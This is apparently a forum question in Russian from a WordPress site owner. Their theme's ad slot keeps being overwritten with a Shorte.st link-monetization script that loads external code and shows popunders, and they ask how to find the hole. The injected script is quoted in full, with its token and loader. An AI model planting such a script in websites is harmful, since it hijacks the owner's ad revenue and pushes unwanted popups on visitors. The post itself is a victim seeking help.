Сайт на WP (Вордпресс и плагины обновляются исправно, все свежее) Появился всплывающий баннер. Путем изучения исходного кода установили, что в теле страницы выводится код с сократителя ссылок Shorte.st (они платят за переходы по сокращенным ссылкам).

Код следующий:

<script type="text/javascript">//<![CDATA[

(function() {

var configuration = {

"token": "a6f162b602a6de26110784b1c5ccc382",

"entryScript": {

"type": "timeout",

"timeout": 3000,

"capping": {

"limit": 5,

"timeout": 24

}

},

"exitScript": {

"enabled": true

},

"popUnder": {

"enabled": true

}

};

var script = document.createElement('script');

script.async = true;

script.src = '//cdn.shorte.st/link-converter.min.js';

script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};

var entry = document.getElementsByTagName('script')[0];

entry.parentNode.insertBefore(script, entry);

})();

//]]></script>

Было установлено, что он перезаписывает содержимое настроек темы, а именно расположение одного из рекламных баннеров (в верхней части рекламы), так как там у нас выводилась реклама Яндекса.

Перезаписываем код на свой, но через день-два он перезаписывается снова вышеуказанным кодом.

Сканировали сайт на вирусы – чисто. Значит, есть уязвимость на сайте. Как ее найти. И кто сталкивался с подобным?